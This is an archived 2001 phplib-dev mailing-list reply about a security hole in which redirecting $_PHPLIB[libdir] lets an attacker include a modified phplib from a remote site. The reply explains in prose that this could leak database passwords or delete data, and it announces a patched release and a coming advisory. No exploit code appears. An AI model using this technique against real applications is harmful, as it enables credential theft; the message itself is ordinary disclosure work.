Re[2]: [phplib-dev] security: READ THIS!
by nathan r. hruby other posts by this author
Jul 14 2001 7:46PM messages near this date
Re: [phplib-dev] security: READ THIS!
|
[phplib-dev] guidelines for phplib-based packages design/integration?
On Sat, 14 Jul 2001, Jeff Stuart wrote:
> Hello nathan,
>
>
> Ok.. let me ask a stupid question here.
>
> Exactly WHAT is the hole? You're redirecting $_PHPLIB[libdir]. Ok.. so my
> prepend.php3 has the following:
[snip prepend.php3]
>
> Now since I define my database connections in local.inc, exactly WHAT is the
> problem? My script won't work. Oh no! Some "hacker" just broke my script
> but just for him/her. Or am I just being dense here?
>
An evil user could simply import a modified verion of phplib from their
own site into your running app that did nasty things like email your db
passwords, app passwords, delete things, etc.. It could, potentially, be
very devistating.
I will generate a 7.2d with this change and send it to the approprerate
places by tommorow morning. Giancarlo, can you generate a security
advisement (with description of hole and exploit code) and send it to me
off-list please for inclusion with the annoucenment?
-n
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
nathan hruby / digital statement
nathan@[...].com
http://www.dstatement.com/
Public GPG key can be found at:
http://www.dstatement.com/nathan-gpg-key.txt
ED54 9A5E 132D BD01 9103 EEF3 E1B9 4738 EC90 801B
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--
Abbestellen mit Mail an: phplib-dev-unsubscribe@[...].de
Kommandoliste mit Mail an: phplib-dev-help@lists.netuse.de
Thread:
giancarlo pinerolo
giancarlo pinerolo
giancarlo pinerolo
nathan r. hruby
Jeff Stuart
nathan r. hruby
Jeff Stuart
nathan r. hruby
nathan r. hruby
|
